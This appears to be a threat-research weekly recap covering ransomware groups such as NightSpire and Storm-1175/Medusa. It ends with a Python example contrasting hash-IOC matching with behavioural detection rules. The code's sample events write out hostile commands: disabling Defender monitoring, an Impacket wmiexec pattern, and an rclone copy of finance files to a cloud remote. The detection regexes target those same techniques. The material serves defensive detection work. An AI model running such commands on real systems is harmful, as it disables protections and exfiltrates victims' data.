Hashtag: #RansomwareOps
Threat Research | Weekly Recap [12 Apr 2026]

Cybersecurity Threat Research 'Weekly' Recap. This week highlighted a broad surge in supply-chain and package ecosystem attacks, AI-themed lure campaigns around Claude and related tooling, evolving infostealer and RAT families (STX RAT, Lumma/Remus), trojanized installers and MaaS campaigns (ClickFix, CastleLoader), ransomware operations (Storm1175/Medusa, NightSpire) and pervasive vulnerability disclosures, with notable data exfiltration tied to TeamPCP and a focus on defense exercises and immutable backups. #TeamPCP #Axios #STXRAT #Remus #Lumma #CastleLoader #ClipBanker #HWMonitor #ScreenConnect #Storm1175 #Medusa #NightSpire #BeastRansomware #Sinobi #EvilTokens #Graphalgo #ForestBlizzard #APT35 #DPRK #Handala #MOIS #OpenClaw #Marimo #Kubernetes #FortiGate

This week’s threat recap reveals a spike in supply-chain attacks, AI-themed lures targeting Claude tools, evolving infostealers (STX RAT, Lumma/Remus), MaaS campaigns, ransomware (Storm1175, NightSpire), and major data leaks by TeamPCP. #AIThreats #RansomwareOps

Decoding NightSpire: Ransomware IOCs Aren't Set in Stone

NightSpire ransomware incidents show varying TTPs across separate intrusions, including use of remote access, third-party tools for data staging and exfiltration, and changes to ransom notes and encryptor hashes over time. These variations complicate attribution and detection, particularly when operations may be run in-house or as RaaS affiliates. #NightSpire #Huntress

NightSpire ransomware shows evolving TTPs including varied ransom notes, encryptor hashes, and use of remote access plus third-party tools for data staging and exfiltration. Attribution remains complex. #RansomwareOps #DataExfiltration #RemoteAccess

Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operations

Storm-1175 (reported alongside the public label "OWASSRF") has exploited multiple public-facing application vulnerabilities, including CVE-2022-41080/CVE-2022-41082 in Exchange OWA, to gain initial access, deploy web shells or remote access payloads, and rapidly move to Medusa ransomware deployment. The actor has also leveraged zero-days and N-day flaws (e.g., CVE-2026-23760 in SmarterMail and CVE-2025-10035 in GoAnywhere MFT), abused LOLBins, RMM tools, Impacket, PDQ Deployer, and Rclone for credential theft, lateral movement, exfiltration, and Defender tampering to enable double-extortion operations. #Storm-1175 #Medusa

Storm-1175 exploits web-facing apps including Exchange OWA zero-days and vulnerabilities to deploy Medusa ransomware rapidly. Techniques include credential theft, lateral movement, and Defender tampering. #RansomwareOps #ExchangeServer #ThreatIntel

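The NightSpire entry (encryptor hashes and ransom notes that change between intrusions) and the Storm-1175 entry (web shells, Impacket, Rclone and Defender tampering ahead of Medusa deployment) make the same point from two sides: hash IOCs age out fast, while the pre-encryption tradecraft is what repeats. The following is an added example, not code from either of the linked reports, that runs a hash-IOC check and a handful of behavioural rules over constructed process-creation events. The events, the placeholder hashes and the rule names (`webshell_spawn`, `defender_tamper`, `impacket_wmiexec`, `rclone_exfil`) are all made up for illustration; the command-line shapes the rules key on are the publicly documented defaults of `Set-MpPreference`, Impacket's `wmiexec.py` and Rclone's `remote:` syntax.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed, not real telemetry)."""
    id: int
    parent: str
    image: str
    cmdline: str
    sha256: str = ""


# Constructed sample events for two intrusions that share tradecraft but drop
# differently built encryptors. Hashes are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    ProcEvent(1, "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(2, "cmd.exe", "powershell.exe",
              'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcEvent(3, "WmiPrvSE.exe", "cmd.exe",
              r"cmd.exe /Q /c net user 1> \\127.0.0.1\ADMIN$\__1712345678.9 2>&1"),
    ProcEvent(4, "cmd.exe", "rclone.exe",
              r"rclone.exe copy C:\Finance\ mega:dump --transfers 8"),
    ProcEvent(5, "cmd.exe", "enc.exe", "enc.exe --all", sha256="a" * 64),  # intrusion 1
    ProcEvent(6, "cmd.exe", "enc.exe", "enc.exe --all", sha256="b" * 64),  # intrusion 2, rebuilt
]

# Hash IOCs shared after intrusion 1 only (placeholder value).
KNOWN_ENCRYPTOR_HASHES = {"a" * 64}

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_WORKERS = {"w3wp.exe"}  # IIS worker; add other app-server workers as needed

BEHAVIOUR_RULES = {
    # Defender tampering via the PowerShell cmdlets (disable features / add exclusions).
    "defender_tamper": re.compile(r"(Set|Add)-MpPreference\s+-(Disable|Exclusion)", re.I),
    # Impacket wmiexec.py default: output redirected to \\127.0.0.1\ADMIN$\__<timestamp>.
    "impacket_wmiexec": re.compile(r"/Q /c .*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I),
    # Rclone copy/sync/move to a configured remote ("name:path"); image name may be renamed.
    "rclone_exfil": re.compile(r"\b(copy|sync|move)\b\s+\S+\s+[\w-]+:", re.I),
}


def match_hash_iocs(events, known_hashes):
    """Static IOC matching: only catches the exact build whose hash was shared."""
    return [e.id for e in events if e.sha256 and e.sha256.lower() in known_hashes]


def match_behaviours(events):
    """Behaviour matching: keyed on tradecraft that survives a rebuilt encryptor."""
    hits = []
    for e in events:
        # Web shell tell: the IIS worker process spawning an interactive shell.
        if e.parent.lower() in WEB_WORKERS and e.image.lower() in SHELLS:
            hits.append(("webshell_spawn", e.id))
        for name, pattern in BEHAVIOUR_RULES.items():
            if pattern.search(e.cmdline):
                hits.append((name, e.id))
    return hits


if __name__ == "__main__":
    print("hash IOC hits:", match_hash_iocs(SAMPLE_EVENTS, KNOWN_ENCRYPTOR_HASHES))
    for rule, eid in match_behaviours(SAMPLE_EVENTS):
        print(f"{rule:18} event {eid}")
```

Run against the constructed events, the hash list built from intrusion 1 flags only event 5 and misses the rebuilt encryptor in event 6, while the behavioural rules fire on the web shell, the Defender change, the Impacket pattern and the Rclone transfer, none of which depend on which encryptor build lands last. In production, feed the same functions from Sysmon Event ID 1 or EDR process telemetry and tune `rclone_exfil` against legitimate backup jobs before alerting on it.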